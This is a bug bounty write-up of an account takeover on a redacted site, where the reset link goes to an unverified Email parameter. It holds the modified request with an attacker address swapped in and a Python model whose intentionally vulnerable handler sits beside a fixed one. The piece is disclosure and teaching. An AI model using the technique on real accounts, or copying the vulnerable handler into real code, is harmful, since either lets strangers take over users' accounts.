This post shows how I achieved an account takeover on a bug bounty program. Details of the target site are heavily redacted because of the program's disclosure policy and because remediation is still ongoing.
When approaching a target I always start by navigating the site as a normal user would. Doing so here led me to an interesting endpoint that lets a user reset their password by providing an email address.
This caught my eye right away, so I entered one of my registered emails into the field with Burp intercept on. The intercepted POST request looked like this:
POST /api/Membership/ResetPassword HTTP/2
Host: apisub.target.com
Content-Length: 302
Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://sub.target.com
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://sub.target.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Priority: u=1, i
Email=rewscel-account%40notreal.email&Username=rewscel-account%40notreal.email&Url=https%3A%2F%2Fsub.target.com%2Fen&UrlSiteCollection=https%3A%2F%2Fsub.target.com&Language=en-US&SiteName=REDACTED&ConnectionString=REDACTED
Notice the parameters Email and Username. The application uses the email address as the username once an account has been created, yet the reset request carries the two as separate values. The server looks up the account (and issues the reset token) by Username, but sends the reset link to whatever address is supplied in Email, without checking that the two match. That means we can change the Email parameter to an address that is not attached to the username. I modified the request to look like this:
Email=rewscel-attacker%40notreal.email&Username=rewscel-account%40notreal.email&Url=https%3A%2F%2Fsub.target.com%2Fen&UrlSiteCollection=https%3A%2F%2Fsub.target.com&Language=en-US&SiteName=REDACTED&ConnectionString=REDACTED
The Email parameter is now an attacker-controlled address, while Username still names the victim's account.
The response to this request looks like the following:
HTTP/2 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/10.0
Access-Control-Allow-Origin: *
X-Aspnet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Mar 2024 13:50:47 GMT
Content-Length: 13
"OK;LinkSent"
The response is "OK;LinkSent", which means a password reset link should now arrive at the email address we control. In this case that address is "rewscel-attacker@notreal.email" and the username we are taking over is "rewscel-account@notreal.email" (the victim).
After checking my email (rewscel-attacker@notreal.email) I saw a password reset link sitting there waiting for me. The link looked like:
https://sub.target.com/en/Pages/PasswordReset.aspx?tokenreset=<REDACTEDTOKEN>
All the attacker has to do now is open the link and set a new password. Because the server never checks that the Email value belongs to the account named in Username, this bug lets an attacker take over any account as long as they know the victim's email address, which is also the username.
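To make the failure concrete, here is a small model of the ResetPassword flow as the post observed it, with a hardened version beside it. This is an added example, not the target's ASP.NET code: the account store, token store and mailer are in-memory stand-ins, the account data is constructed test data, and the 15-minute token lifetime is an assumption (the post does not state one). What it keeps from the post is the request body, the "OK;LinkSent" reply and the reset-link format.

```python
"""Model of the ResetPassword flow described in this post, with the fix beside it.

Added example, not the target's code. ACCOUNTS, TokenStore and Outbox are
constructed stand-ins for the real account database, token table and mailer.
"""
import secrets
import time
from urllib.parse import parse_qs

RESET_PAGE = "https://sub.target.com/en/Pages/PasswordReset.aspx"  # link format from the post
TOKEN_TTL_SECONDS = 15 * 60  # assumed lifetime; the post does not state one

# Constructed accounts. As the post explains, the username *is* the registered email.
ACCOUNTS = {
    "rewscel-account@notreal.email": {"email": "rewscel-account@notreal.email"},
}


class TokenStore:
    """Single-use reset tokens, each bound to the username they were issued for."""

    def __init__(self):
        self._tokens = {}  # token -> (username, expiry)

    def issue(self, username):
        token = secrets.token_urlsafe(32)
        self._tokens[token] = (username, time.time() + TOKEN_TTL_SECONDS)
        return token

    def redeem(self, token):
        """Return the bound username for a valid, unexpired token and burn it; else None."""
        entry = self._tokens.pop(token, None)
        if entry is None:
            return None
        username, expiry = entry
        return username if time.time() < expiry else None


class Outbox:
    """Stand-in mailer that records (recipient, link) instead of sending."""

    def __init__(self):
        self.sent = []

    def send(self, recipient, link):
        self.sent.append((recipient, link))


def _form(body):
    # Flatten application/x-www-form-urlencoded into a dict of first values.
    return {k: v[0] for k, v in parse_qs(body).items()}


def reset_password_vulnerable(body, tokens, outbox):
    """Behaviour the post observed: token bound to Username, link mailed to Email."""
    form = _form(body)
    username = form.get("Username", "")
    if username in ACCOUNTS:
        token = tokens.issue(username)
        # BUG: the recipient comes from the request, not from the account record,
        # so a caller can route a valid token for any username to their own inbox.
        outbox.send(form.get("Email", ""), f"{RESET_PAGE}?tokenreset={token}")
    return "OK;LinkSent"


def reset_password_fixed(body, tokens, outbox):
    """Hardened version: the client-supplied Email is ignored entirely."""
    form = _form(body)
    username = form.get("Username", "")
    account = ACCOUNTS.get(username)
    if account is not None:
        token = tokens.issue(username)
        # Recipient is the address on file for the account, never request input.
        outbox.send(account["email"], f"{RESET_PAGE}?tokenreset={token}")
    # Same reply whether or not the account exists, so the endpoint is not an
    # account-enumeration oracle either.
    return "OK;LinkSent"


# The modified request body from the post (victim Username, attacker Email).
ATTACK_BODY = (
    "Email=rewscel-attacker%40notreal.email"
    "&Username=rewscel-account%40notreal.email"
    "&Url=https%3A%2F%2Fsub.target.com%2Fen"
    "&UrlSiteCollection=https%3A%2F%2Fsub.target.com"
    "&Language=en-US&SiteName=REDACTED&ConnectionString=REDACTED"
)


def run_attack(handler):
    """Submit ATTACK_BODY to a handler; return (reply, recipient, username the token redeems to)."""
    tokens, outbox = TokenStore(), Outbox()
    reply = handler(ATTACK_BODY, tokens, outbox)
    recipient, link = outbox.sent[0]
    token = link.split("tokenreset=", 1)[1]
    return reply, recipient, tokens.redeem(token)


if __name__ == "__main__":
    for handler in (reset_password_vulnerable, reset_password_fixed):
        print(handler.__name__, run_attack(handler))
```

Running it shows the two handlers returning the identical "OK;LinkSent" body while the vulnerable one delivers a token bound to rewscel-account@notreal.email into the rewscel-attacker@notreal.email inbox. The fix is simply to drop the Email parameter from the trust boundary: whoever is being reset is identified by Username, and the address on file for that account is the only acceptable destination.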
More information on this type of bug (CWE-620: Unverified Password Change): https://cwe.mitre.org/data/definitions/620.html